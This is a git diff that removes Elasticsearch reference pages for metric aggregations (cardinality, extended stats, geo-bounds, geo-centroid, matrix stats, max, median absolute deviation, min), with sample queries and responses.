hashed -values, the exact distributions of hashes in a dataset can affect the -accuracy of the cardinality. - -Please also note that even with a threshold as low as 100, the error remains -very low, even when counting millions of items. - -==== Pre-computed hashes - -On string fields that have a high cardinality, it might be faster to store the -hash of your field values in your index and then run the cardinality aggregation -on this field. This can either be done by providing hash values from client-side -or by letting Elasticsearch compute hash values for you by using the -{plugins}/mapper-murmur3.html[`mapper-murmur3`] plugin. - -NOTE: Pre-computing hashes is usually only useful on very large and/or -high-cardinality fields as it saves CPU and memory. However, on numeric -fields, hashing is very fast and storing the original values requires as much -or less memory than storing the hashes. This is also true on low-cardinality -string fields, especially given that those have an optimization in order to -make sure that hashes are computed at most once per unique value per segment. - -==== Script - -The `cardinality` metric supports scripting, with a noticeable performance hit -however since hashes need to be computed on the fly. 
- -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_promoted_count": { - "cardinality": { - "script": { - "lang": "painless", - "source": "doc['type'].value + ' ' + doc['promoted'].value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "type_promoted_count": { - "cardinality": { - "script": { - "id": "my_script", - "params": { - "type_field": "type", - "promoted_field": "promoted" - } - } - } - } - } -} --------------------------------------------------- -// TEST[skip:no script] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "tag_cardinality": { - "cardinality": { - "field": "tag", - "missing": "N/A" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] -<1> Documents without a value in the `tag` field will fall into the same bucket as documents that have the value `N/A`. diff --git a/docs/reference/aggregations/metrics/extendedstats-aggregation.asciidoc b/docs/reference/aggregations/metrics/extendedstats-aggregation.asciidoc deleted file mode 100644 index c6283c3867f..00000000000 --- a/docs/reference/aggregations/metrics/extendedstats-aggregation.asciidoc +++ /dev/null @@ -1,197 +0,0 @@ -[[search-aggregations-metrics-extendedstats-aggregation]] -=== Extended stats aggregation -++++ -Extended stats -++++ - -A `multi-value` metrics aggregation that computes stats over numeric values extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script. - -The `extended_stats` aggregations is an extended version of the <> aggregation, where additional metrics are added such as `sum_of_squares`, `variance`, `std_deviation` and `std_deviation_bounds`. - -Assuming the data consists of documents representing exams grades (between 0 and 100) of students - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { "extended_stats": { "field": "grade" } } - } -} --------------------------------------------------- -// TEST[setup:exams] - -The above aggregation computes the grades statistics over all documents. The aggregation type is `extended_stats` and the `field` setting defines the numeric field of the documents the stats will be computed on. The above will return the following: - -The `std_deviation` and `variance` are calculated as population metrics so they are always the same as `std_deviation_population` and `variance_population` respectively. - -[source,console-result] --------------------------------------------------- -{ - ... 
- - "aggregations": { - "grades_stats": { - "count": 2, - "min": 50.0, - "max": 100.0, - "avg": 75.0, - "sum": 150.0, - "sum_of_squares": 12500.0, - "variance": 625.0, - "variance_population": 625.0, - "variance_sampling": 1250.0, - "std_deviation": 25.0, - "std_deviation_population": 25.0, - "std_deviation_sampling": 35.35533905932738, - "std_deviation_bounds": { - "upper": 125.0, - "lower": 25.0, - "upper_population": 125.0, - "lower_population": 25.0, - "upper_sampling": 145.71067811865476, - "lower_sampling": 4.289321881345245 - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`grades_stats` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Standard Deviation Bounds -By default, the `extended_stats` metric will return an object called `std_deviation_bounds`, which provides an interval of plus/minus two standard -deviations from the mean. This can be a useful way to visualize variance of your data. If you want a different boundary, for example -three standard deviations, you can set `sigma` in the request: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "field": "grade", - "sigma": 3 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] -<1> `sigma` controls how many standard deviations +/- from the mean should be displayed - -`sigma` can be any non-negative double, meaning you can request non-integer values such as `1.5`. A value of `0` is valid, but will simply -return the average for both `upper` and `lower` bounds. - -The `upper` and `lower` bounds are calculated as population metrics so they are always the same as `upper_population` and -`lower_population` respectively. - -.Standard Deviation and Bounds require normality -[NOTE] -===== -The standard deviation and its bounds are displayed by default, but they are not always applicable to all data-sets. Your data must -be normally distributed for the metrics to make sense. The statistics behind standard deviations assumes normally distributed data, so -if your data is skewed heavily left or right, the value returned will be misleading. -===== - -==== Script - -Computing the grades stats based on a script: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "script": { - "source": "doc['grade'].value", - "lang": "painless" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "script": { - "id": "my_script", - "params": { - "field": "grade" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams,stored_example_script] - -===== Value Script - -It turned out that the exam was way above the level of the students and a grade correction needs to be applied. 
We can use value script to get the new stats: - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "field": "grade", - "script": { - "lang": "painless", - "source": "_value * params.correction", - "params": { - "correction": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET /exams/_search -{ - "size": 0, - "aggs": { - "grades_stats": { - "extended_stats": { - "field": "grade", - "missing": 0 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -<1> Documents without a value in the `grade` field will fall into the same bucket as documents that have the value `0`. diff --git a/docs/reference/aggregations/metrics/geobounds-aggregation.asciidoc b/docs/reference/aggregations/metrics/geobounds-aggregation.asciidoc deleted file mode 100644 index 51d551b67db..00000000000 --- a/docs/reference/aggregations/metrics/geobounds-aggregation.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[search-aggregations-metrics-geobounds-aggregation]] -=== Geo-bounds aggregation -++++ -Geo-bounds -++++ - -A metric aggregation that computes the bounding box containing all geo values for a field. - -Example: - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "query": { - "match": { "name": "musée" } - }, - "aggs": { - "viewport": { - "geo_bounds": { - "field": "location", <1> - "wrap_longitude": true <2> - } - } - } -} --------------------------------------------------- - -<1> The `geo_bounds` aggregation specifies the field to use to obtain the bounds. -<2> [[geo-bounds-wrap-longitude]] `wrap_longitude` is an optional parameter which specifies whether the bounding box should be allowed to overlap the international date line. The default value is `true`. - -The above aggregation demonstrates how one would compute the bounding box of the location field for all documents with a business type of shop - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "viewport": { - "bounds": { - "top_left": { - "lat": 48.86111099738628, - "lon": 2.3269999679178 - }, - "bottom_right": { - "lat": 48.85999997612089, - "lon": 2.3363889567553997 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -[discrete] -[role="xpack"] -[[geobounds-aggregation-geo-shape]] -==== Geo Bounds Aggregation on `geo_shape` fields - -The Geo Bounds Aggregation is also supported on `geo_shape` fields. - -If <> is set to `true` -(the default), the bounding box can overlap the international date line and -return a bounds where the `top_left` longitude is larger than the `top_right` -longitude. - -For example, the upper right longitude will typically be greater than the lower -left longitude of a geographic bounding box. However, when the area -crosses the 180° meridian, the value of the lower left longitude will be -greater than the value of the upper right longitude. See -http://docs.opengeospatial.org/is/12-063r5/12-063r5.html#30[Geographic bounding box] on the Open Geospatial Consortium website for more information. - -Example: - -[source,console] --------------------------------------------------- -PUT /places -{ - "mappings": { - "properties": { - "geometry": { - "type": "geo_shape" - } - } - } -} - -POST /places/_bulk?refresh -{"index":{"_id":1}} -{"name": "NEMO Science Museum", "geometry": "POINT(4.912350 52.374081)" } -{"index":{"_id":2}} -{"name": "Sportpark De Weeren", "geometry": { "type": "Polygon", "coordinates": [ [ [ 4.965305328369141, 52.39347642069457 ], [ 4.966979026794433, 52.391721758934835 ], [ 4.969425201416015, 52.39238958618537 ], [ 4.967944622039794, 52.39420969150824 ], [ 4.965305328369141, 52.39347642069457 ] ] ] } } - -POST /places/_search?size=0 -{ - "aggs": { - "viewport": { - "geo_bounds": { - "field": "geometry" - } - } - } -} --------------------------------------------------- -// TEST - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "viewport": { - "bounds": { - "top_left": { - "lat": 52.39420966710895, - "lon": 4.912349972873926 - }, - "bottom_right": { - "lat": 52.374080987647176, - "lon": 4.969425117596984 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] diff --git a/docs/reference/aggregations/metrics/geocentroid-aggregation.asciidoc b/docs/reference/aggregations/metrics/geocentroid-aggregation.asciidoc deleted file mode 100644 index 2658ab6683d..00000000000 --- a/docs/reference/aggregations/metrics/geocentroid-aggregation.asciidoc +++ /dev/null @@ -1,244 +0,0 @@ -[[search-aggregations-metrics-geocentroid-aggregation]] -=== Geo-centroid aggregation -++++ -Geo-centroid -++++ - -A metric aggregation that computes the weighted {wikipedia}/Centroid[centroid] from all coordinate values for geo fields. 
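For `geo_point` fields each point contributes with equal weight, so conceptually the centroid is just the coordinate-wise mean of all collected points (see the centroid calculation table later in this section). The following Python sketch only illustrates that idea on made-up coordinates; it is not how Elasticsearch implements the aggregation internally.

[source,python]
--------------------------------------------------
# Illustrative only: centroid of equally weighted geo_point values as a
# coordinate-wise mean. The (lat, lon) pairs below are hypothetical sample data.
points = [
    (52.374081, 4.912350),
    (52.369219, 4.901618),
    (48.861111, 2.336389),
]

lat = sum(p[0] for p in points) / len(points)
lon = sum(p[1] for p in points) / len(points)
print({"location": {"lat": lat, "lon": lon}, "count": len(points)})
--------------------------------------------------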
- -Example: - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "city": "Amsterdam", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "city": "Amsterdam", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "city": "Amsterdam", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "city": "Antwerp", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "city": "Paris", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "city": "Paris", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggs": { - "centroid": { - "geo_centroid": { - "field": "location" <1> - } - } - } -} --------------------------------------------------- - -<1> The `geo_centroid` aggregation specifies the field to use for computing the centroid. (NOTE: field must be a <> type) - -The above aggregation demonstrates how one would compute the centroid of the location field for all documents with a crime type of burglary. - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "centroid": { - "location": { - "lat": 51.00982965203002, - "lon": 3.9662131341174245 - }, - "count": 6 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -The `geo_centroid` aggregation is more interesting when combined as a sub-aggregation to other bucket aggregations. - -Example: - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "cities": { - "terms": { "field": "city.keyword" }, - "aggs": { - "centroid": { - "geo_centroid": { "field": "location" } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The above example uses `geo_centroid` as a sub-aggregation to a -<> bucket aggregation -for finding the central location for museums in each city. - -The response for the above aggregation: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "cities": { - "sum_other_doc_count": 0, - "doc_count_error_upper_bound": 0, - "buckets": [ - { - "key": "Amsterdam", - "doc_count": 3, - "centroid": { - "location": { - "lat": 52.371655656024814, - "lon": 4.909563297405839 - }, - "count": 3 - } - }, - { - "key": "Paris", - "doc_count": 2, - "centroid": { - "location": { - "lat": 48.86055548675358, - "lon": 2.3316944623366 - }, - "count": 2 - } - }, - { - "key": "Antwerp", - "doc_count": 1, - "centroid": { - "location": { - "lat": 51.22289997059852, - "lon": 4.40519998781383 - }, - "count": 1 - } - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - - -[discrete] -[role="xpack"] -[[geocentroid-aggregation-geo-shape]] -==== Geo Centroid Aggregation on `geo_shape` fields - -The centroid metric for geo-shapes is more nuanced than for points. 
The centroid of a specific aggregation bucket -containing shapes is the centroid of the highest-dimensionality shape type in the bucket. For example, if a bucket contains -shapes comprising of polygons and lines, then the lines do not contribute to the centroid metric. Each type of shape's -centroid is calculated differently. Envelopes and circles ingested via the <> are treated -as polygons. - -|=== -|Geometry Type | Centroid Calculation - -|[Multi]Point -|equally weighted average of all the coordinates - -|[Multi]LineString -|a weighted average of all the centroids of each segment, where the weight of each segment is its length in degrees - -|[Multi]Polygon -|a weighted average of all the centroids of all the triangles of a polygon where the triangles are formed by every two consecutive vertices and the starting-point. - holes have negative weights. weights represent the area of the triangle in deg^2 calculated - -|GeometryCollection -|The centroid of all the underlying geometries with the highest dimension. If Polygons and Lines and/or Points, then lines and/or points are ignored. - If Lines and Points, then points are ignored -|=== - -Example: - -[source,console] --------------------------------------------------- -PUT /places -{ - "mappings": { - "properties": { - "geometry": { - "type": "geo_shape" - } - } - } -} - -POST /places/_bulk?refresh -{"index":{"_id":1}} -{"name": "NEMO Science Museum", "geometry": "POINT(4.912350 52.374081)" } -{"index":{"_id":2}} -{"name": "Sportpark De Weeren", "geometry": { "type": "Polygon", "coordinates": [ [ [ 4.965305328369141, 52.39347642069457 ], [ 4.966979026794433, 52.391721758934835 ], [ 4.969425201416015, 52.39238958618537 ], [ 4.967944622039794, 52.39420969150824 ], [ 4.965305328369141, 52.39347642069457 ] ] ] } } - -POST /places/_search?size=0 -{ - "aggs": { - "centroid": { - "geo_centroid": { - "field": "geometry" - } - } - } -} --------------------------------------------------- -// TEST - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "centroid": { - "location": { - "lat": 52.39296147599816, - "lon": 4.967404240742326 - }, - "count": 2 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - - -[WARNING] -.Using `geo_centroid` as a sub-aggregation of `geohash_grid` -==== -The <> -aggregation places documents, not individual geo-points, into buckets. If a -document's `geo_point` field contains <>, the document -could be assigned to multiple buckets, even if one or more of its geo-points are -outside the bucket boundaries. - -If a `geocentroid` sub-aggregation is also used, each centroid is calculated -using all geo-points in a bucket, including those outside the bucket boundaries. -This can result in centroids outside of bucket boundaries. 
-==== diff --git a/docs/reference/aggregations/metrics/matrix-stats-aggregation.asciidoc b/docs/reference/aggregations/metrics/matrix-stats-aggregation.asciidoc deleted file mode 100644 index edf84ec6425..00000000000 --- a/docs/reference/aggregations/metrics/matrix-stats-aggregation.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[search-aggregations-matrix-stats-aggregation]] -=== Matrix stats aggregation -++++ -Matrix stats -++++ - -The `matrix_stats` aggregation is a numeric aggregation that computes the following statistics over a set of document fields: - -[horizontal] -`count`:: Number of per field samples included in the calculation. -`mean`:: The average value for each field. -`variance`:: Per field Measurement for how spread out the samples are from the mean. -`skewness`:: Per field measurement quantifying the asymmetric distribution around the mean. -`kurtosis`:: Per field measurement quantifying the shape of the distribution. -`covariance`:: A matrix that quantitatively describes how changes in one field are associated with another. -`correlation`:: The covariance matrix scaled to a range of -1 to 1, inclusive. Describes the relationship between field - distributions. - -IMPORTANT: Unlike other metric aggregations, the `matrix_stats` aggregation does -not support scripting. - -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /statistics/_doc/0 -{"poverty": 24.0, "income": 50000.0} - -PUT /statistics/_doc/1 -{"poverty": 13.0, "income": 95687.0} - -PUT /statistics/_doc/2 -{"poverty": 69.0, "income": 7890.0} - -POST /_refresh --------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -The following example demonstrates the use of matrix stats to describe the relationship between income and poverty. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "statistics": { - "matrix_stats": { - "fields": [ "poverty", "income" ] - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -The aggregation type is `matrix_stats` and the `fields` setting defines the set of fields (as an array) for computing -the statistics. The above request returns the following response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "statistics": { - "doc_count": 50, - "fields": [ { - "name": "income", - "count": 50, - "mean": 51985.1, - "variance": 7.383377037755103E7, - "skewness": 0.5595114003506483, - "kurtosis": 2.5692365287787124, - "covariance": { - "income": 7.383377037755103E7, - "poverty": -21093.65836734694 - }, - "correlation": { - "income": 1.0, - "poverty": -0.8352655256272504 - } - }, { - "name": "poverty", - "count": 50, - "mean": 12.732000000000001, - "variance": 8.637730612244896, - "skewness": 0.4516049811903419, - "kurtosis": 2.8615929677997767, - "covariance": { - "income": -21093.65836734694, - "poverty": 8.637730612244896 - }, - "correlation": { - "income": -0.8352655256272504, - "poverty": 1.0 - } - } ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/: (\-)?[0-9\.E]+/: $body.$_path/] - -The `doc_count` field indicates the number of documents involved in the computation of the statistics. - -==== Multi Value Fields - -The `matrix_stats` aggregation treats each document field as an independent sample. 
The `mode` parameter controls what -array value the aggregation will use for array or multi-valued fields. This parameter can take one of the following: - -[horizontal] -`avg`:: (default) Use the average of all values. -`min`:: Pick the lowest value. -`max`:: Pick the highest value. -`sum`:: Use the sum of all values. -`median`:: Use the median of all values. - -==== Missing Values - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they had a value. -This is done by adding a set of fieldname : value mappings to specify default values per field. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "matrixstats": { - "matrix_stats": { - "fields": [ "poverty", "income" ], - "missing": { "income": 50000 } <1> - } - } - } -} --------------------------------------------------- - -<1> Documents without a value in the `income` field will have the default value `50000`. - -==== Script - -This aggregation family does not yet support scripting. diff --git a/docs/reference/aggregations/metrics/max-aggregation.asciidoc b/docs/reference/aggregations/metrics/max-aggregation.asciidoc deleted file mode 100644 index cb6a3f64ab7..00000000000 --- a/docs/reference/aggregations/metrics/max-aggregation.asciidoc +++ /dev/null @@ -1,195 +0,0 @@ -[[search-aggregations-metrics-max-aggregation]] -=== Max aggregation -++++ -Max -++++ - -A `single-value` metrics aggregation that keeps track and returns the maximum -value among the numeric values extracted from the aggregated documents. These -values can be extracted either from specific numeric fields in the documents, -or be generated by a provided script. - -NOTE: The `min` and `max` aggregation operate on the `double` representation of -the data. As a consequence, the result may be approximate when running on longs -whose absolute value is greater than +2^53+. - -Computing the max price value across all documents - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "max_price": { "max": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "max_price": { - "value": 200.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -As can be seen, the name of the aggregation (`max_price` above) also serves as -the key by which the aggregation result can be retrieved from the returned -response. - -==== Script - -The `max` aggregation can also calculate the maximum of a script. The example -below computes the maximum price: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "max_price" : { - "max" : { - "script" : { - "source" : "doc.price.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will use the <> scripting language -and no script parameters. 
To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "max_price" : { - "max" : { - "script" : { - "id": "my_script", - "params": { - "field": "price" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales,stored_example_script] - -==== Value Script - -Let's say that the prices of the documents in our index are in USD, but we -would like to compute the max in EURO (and for the sake of this example, let's -say the conversion rate is 1.2). We can use a value script to apply the -conversion rate to every value before it is aggregated: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "max_price_in_euros" : { - "max" : { - "field" : "price", - "script" : { - "source" : "_value * params.conversion_rate", - "params" : { - "conversion_rate" : 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should -be treated. By default they will be ignored but it is also possible to treat -them as if they had a value. - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs" : { - "grade_max" : { - "max" : { - "field" : "grade", - "missing": 10 <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `grade` field will fall into the same -bucket as documents that have the value `10`. - -[[search-aggregations-metrics-max-aggregation-histogram-fields]] -==== Histogram fields - -When `max` is computed on <>, the result of the aggregation is the maximum -of all elements in the `values` array. Note, that the `counts` array of the histogram is ignored. - -For example, for the following index that stores pre-aggregated histograms with latency metrics for different networks: - -[source,console] --------------------------------------------------- -PUT metrics_index/_doc/1 -{ - "network.name" : "net-1", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [3, 7, 23, 12, 6] <2> - } -} - -PUT metrics_index/_doc/2 -{ - "network.name" : "net-2", - "latency_histo" : { - "values" : [0.1, 0.2, 0.3, 0.4, 0.5], <1> - "counts" : [8, 17, 8, 7, 6] <2> - } -} - -POST /metrics_index/_search?size=0 -{ - "aggs" : { - "min_latency" : { "min" : { "field" : "latency_histo" } } - } -} --------------------------------------------------- - -The `max` aggregation will return the maximum value of all histogram fields: - -[source,console-result] --------------------------------------------------- -{ - ... 
- "aggregations": { - "min_latency": { - "value": 0.5 - } - } -} --------------------------------------------------- -// TESTRESPONSE[skip:test not setup] diff --git a/docs/reference/aggregations/metrics/median-absolute-deviation-aggregation.asciidoc b/docs/reference/aggregations/metrics/median-absolute-deviation-aggregation.asciidoc deleted file mode 100644 index 21811542073..00000000000 --- a/docs/reference/aggregations/metrics/median-absolute-deviation-aggregation.asciidoc +++ /dev/null @@ -1,187 +0,0 @@ -[[search-aggregations-metrics-median-absolute-deviation-aggregation]] -=== Median absolute deviation aggregation -++++ -Median absolute deviation -++++ - -This `single-value` aggregation approximates the {wikipedia}/Median_absolute_deviation[median absolute deviation] -of its search results. - -Median absolute deviation is a measure of variability. It is a robust -statistic, meaning that it is useful for describing data that may have -outliers, or may not be normally distributed. For such data it can be more -descriptive than standard deviation. - -It is calculated as the median of each data point's deviation from the median -of the entire sample. That is, for a random variable X, the median absolute -deviation is median(|median(X) - X~i~|). - -==== Example - -Assume our data represents product reviews on a one to five star scale. -Such reviews are usually summarized as a mean, which is easily understandable -but doesn't describe the reviews' variability. Estimating the median absolute -deviation can provide insight into how much reviews vary from one another. - -In this example we have a product which has an average rating of -3 stars. Let's look at its ratings' median absolute deviation to determine -how much they vary - -[source,console] ---------------------------------------------------------- -GET reviews/_search -{ - "size": 0, - "aggs": { - "review_average": { - "avg": { - "field": "rating" - } - }, - "review_variability": { - "median_absolute_deviation": { - "field": "rating" <1> - } - } - } -} ---------------------------------------------------------- -// TEST[setup:reviews] -<1> `rating` must be a numeric field - -The resulting median absolute deviation of `2` tells us that there is a fair -amount of variability in the ratings. Reviewers must have diverse opinions about -this product. - -[source,console-result] ---------------------------------------------------------- -{ - ... - "aggregations": { - "review_average": { - "value": 3.0 - }, - "review_variability": { - "value": 2.0 - } - } -} ---------------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -==== Approximation - -The naive implementation of calculating median absolute deviation stores the -entire sample in memory, so this aggregation instead calculates an -approximation. It uses the https://github.com/tdunning/t-digest[TDigest data structure] -to approximate the sample median and the median of deviations from the sample -median. For more about the approximation characteristics of TDigests, see -<>. - -The tradeoff between resource usage and accuracy of a TDigest's quantile -approximation, and therefore the accuracy of this aggregation's approximation -of median absolute deviation, is controlled by the `compression` parameter. A -higher `compression` setting provides a more accurate approximation at the -cost of higher memory usage. 
For more about the characteristics of the TDigest
-`compression` parameter see
-<>.
-
-[source,console]
---------------------------------------------------------
-GET reviews/_search
-{
-  "size": 0,
-  "aggs": {
-    "review_variability": {
-      "median_absolute_deviation": {
-        "field": "rating",
-        "compression": 100
-      }
-    }
-  }
-}
---------------------------------------------------------
-// TEST[setup:reviews]
-
-The default `compression` value for this aggregation is `1000`. At this
-compression level this aggregation is usually within 5% of the exact result,
-but observed performance will depend on the sample data.
-
-==== Script
-
-This metric aggregation supports scripting. In our example above, product
-reviews are on a scale of one to five. If we wanted to modify them to a scale
-of one to ten, we could use scripting.
-
-To provide an inline script:
-
-[source,console]
---------------------------------------------------------
-GET reviews/_search
-{
-  "size": 0,
-  "aggs": {
-    "review_variability": {
-      "median_absolute_deviation": {
-        "script": {
-          "lang": "painless",
-          "source": "doc['rating'].value * params.scaleFactor",
-          "params": {
-            "scaleFactor": 2
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------------
-// TEST[setup:reviews]
-
-To provide a stored script:
-
-[source,console]
---------------------------------------------------------
-GET reviews/_search
-{
-  "size": 0,
-  "aggs": {
-    "review_variability": {
-      "median_absolute_deviation": {
-        "script": {
-          "id": "my_script",
-          "params": {
-            "field": "rating"
-          }
-        }
-      }
-    }
-  }
-}
---------------------------------------------------------
-// TEST[setup:reviews,stored_example_script]
-
-==== Missing value
-
-The `missing` parameter defines how documents that are missing a value should be
-treated. By default they will be ignored but it is also possible to treat them
-as if they had a value.
-
-Let's be optimistic and assume some reviewers loved the product so much that
-they forgot to give it a rating. We'll assign them five stars:
-
-[source,console]
---------------------------------------------------------
-GET reviews/_search
-{
-  "size": 0,
-  "aggs": {
-    "review_variability": {
-      "median_absolute_deviation": {
-        "field": "rating",
-        "missing": 5
-      }
-    }
-  }
-}
---------------------------------------------------------
-// TEST[setup:reviews]
diff --git a/docs/reference/aggregations/metrics/min-aggregation.asciidoc b/docs/reference/aggregations/metrics/min-aggregation.asciidoc
deleted file mode 100644
index d6614e4fd48..00000000000
--- a/docs/reference/aggregations/metrics/min-aggregation.asciidoc
+++ /dev/null
@@ -1,196 +0,0 @@
-[[search-aggregations-metrics-min-aggregation]]
-=== Min aggregation
-++++
-Min
-++++
-
-A `single-value` metrics aggregation that keeps track of and returns the minimum
-value among the numeric values extracted from the aggregated documents. These
-values can be extracted either from specific numeric fields in the documents,
-or be generated by a provided script.
-
-NOTE: The `min` and `max` aggregations operate on the `double` representation of
-the data. As a consequence, the result may be approximate when running on longs
-whose absolute value is greater than +2^53+.
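The imprecision described in the note above comes from the 53-bit significand of an IEEE 754 `double`: integers with an absolute value above 2^53 can no longer all be represented exactly. A quick Python illustration of the effect:

[source,python]
--------------------------------------------------
# Integers above 2**53 collapse onto the nearest representable double.
exact = 2**53
print(float(exact) == float(exact + 1))   # True: both longs map to the same double
print(float(exact + 1))                   # 9007199254740992.0, not ...993.0
print(float(exact - 1) == exact - 1)      # True: values below 2**53 stay exact
--------------------------------------------------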
- -Computing the min price value across all documents: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "min_price": { "min": { "field": "price" } } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - - "aggregations": { - "min_price": { - "value": 10.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -As can be seen, the name of the aggregation (`min_price` above) also serves as -the key by which the aggregation result can be retrieved from the returned -response. - -==== Script - -The `min` aggregation can also calculate the minimum of a script. The example -below computes the minimum price: - -[source,console] --------------------------------------------------- -POST /sales/_search -{ - "aggs": { - "min_price": { - "min": { - "script": { - "source": "doc.price.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -This will use the <> scripting language -and no script 